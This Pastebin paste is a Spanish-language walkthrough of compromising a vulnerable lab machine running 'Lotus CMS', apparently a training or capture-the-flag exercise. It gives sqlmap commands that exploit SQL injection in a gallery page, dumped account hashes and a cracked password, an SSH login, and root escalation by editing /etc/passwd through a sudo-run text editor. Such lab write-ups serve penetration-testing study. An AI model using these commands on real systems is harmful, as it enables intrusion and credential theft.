Advertisement
Guest User

aadadsaasdas

a guest
Apr 23rd, 2019
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.11 KB | None | 0 0
  1. 192.168.12.252
  2. Lingoat Security – Lotus CMS
  3. Luego de navegar un poco por la pagina procedimos a verificar que servicios posee levantados, ademas del apache que ya sabiamos, notamos que posee servicios ssh activos, que los confirmamos al realizar una conexión fallida al mismo, por ende necesitariamos conseguir algun usuario del servidor para poder conectarnos por ssh.
  4. Navegando por la pagina llegamos a un apartado correspondiente al siguiente link:
  5. http://192.168.12.252/gallery/gallery.php?id=1&sort=filename#photos
  6. Fijandonos en el link notamos que posee un bloque “id” suceptible a un ataque de inyeccion sql, el cual lo confirmamos corriendo el siguiente comando de sqlmap:
  7.  
  8. sqlmap -u "http://192.168.12.252/gallery/gallery.php?id=1&sort=filename#photos" –dbms=MySQL
  9.  
  10. Sabiendo esto, procedemos a la inyeccion sql con el siguiente comando:
  11.  
  12. sqlmap -u "http://192.168.12.252/gallery/gallery.php?id=1&sort=filename#photos" --dbms=MySQL –dbs
  13. El cual nos devuelve que base de datos existen asociadas a la pagina, los cuales son:
  14.  
  15. available databases [3]:
  16. [*] gallery
  17. [*] information_schema
  18. [*] mysql
  19. Luego de recorrer todas, la base de datos “gallery” es bastante interesante al poseer el siguiente esquema:
  20. Database: gallery
  21. [7 tables]
  22. +----------------------+
  23. | dev_accounts |
  24. | gallarific_comments |
  25. | gallarific_galleries |
  26. | gallarific_photos |
  27. | gallarific_settings |
  28. | gallarific_stats |
  29. | gallarific_users |
  30. +----------------------+
  31. De las cuales nos llamo la atencion la tabla “dev_accouts” a la cual accedimos con el siguiente comando:
  32. sqlmap -u "http://192.168.12.252/gallery/gallery.php?id=1&sort=filename#photos" --dbms=MySQL -D gallery -T dev_accounts –dump
  33. Table: dev_accounts[2 entries]
  34. +----+----------------------------------+------------+
  35. | id | password | username |
  36. +----+----------------------------------+------------+
  37. | 1 | 0d3eccfb887aabd50f243b3f155c0f85 | dreg |
  38. | 2 | 5badcaf789d3d1d09794d8f021f40f0e | loneferret |
  39. +----+----------------------------------+------------+
  40. Consiguiendo dos usuarios y posibles contraseñas, probamos conectarnos con ssh utilizando esas contraseñas las cuales no funcionaron por ende procedimos a verificar si estabas encriptadas, no cumpliendo con el estandar de base64, utilizado anteriormente, probamos con md5 un sistema de encriptado comun, el cual fue positivo pudiendo conseguir los siguientes datos:
  41. Usuario: loneferret y Contraseña: starwars
  42. Intentamos de nuevo conectarnos por ssh, esta vez ya con éxito, concretando la intrucion dentro del servidor, una vez aquí procedimos a intentar una escalada de permisos desde este usuario hasta root.
  43.  
  44. Luego de verificar que no poseemos ningun permiso interesante, dentro de la carpeta de este usuario existia un archivo de texto que cita:
  45.  
  46. “Hello new employee,
  47. It is company policy here to use our newly installed software for editing, creating and viewing files.
  48. Please use the command 'sudo ht'.
  49. Failure to do so will result in you immediate termination.
  50.  
  51. DG
  52. CEO“
  53. El cual nos sugiere utilizar el comando “sudo ht”, el cual luego de googlear hace referencia a un editor de texto con el nombre de ht, al ejecutarlo nos encontramos con el siguiente error:
  54. Error opening terminal: xterm-256color
  55. El cual luego de googlear bastante encontramos la solucion aplicando el siguiente comando:
  56. export TERM=xterm
  57. Aplicado dicha variable de entorno, volvemos a ejecutar el comando esta vez con éxito, accediendo asi a un editor de texto un poco dificil de utilizar.
  58. Ya que el editor de texto esta siendo ejecutado en modo “root” podemos realizar cambios los cuales no teniamos autorizado antes, por ende procedemos a modificar el archivo /etc/passwd agregandonos un usuario lacourMartinez con contraseña op3Rativ*s.lacour.
  59. Luego de convertirnos en usuarios root, procedi a eliminar los usuarios vulnerables loneferret y dreg, ademas de elegir una contraseña fuerte al nuevo usuario, nos aseguramos de dificultar el acceso, y evitar realizar la misma intrusion la cual nos dio acceso a este servidor.
  60. REVISAR COMO NOS HICIMOS ROOT NO ME ACUERDO.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement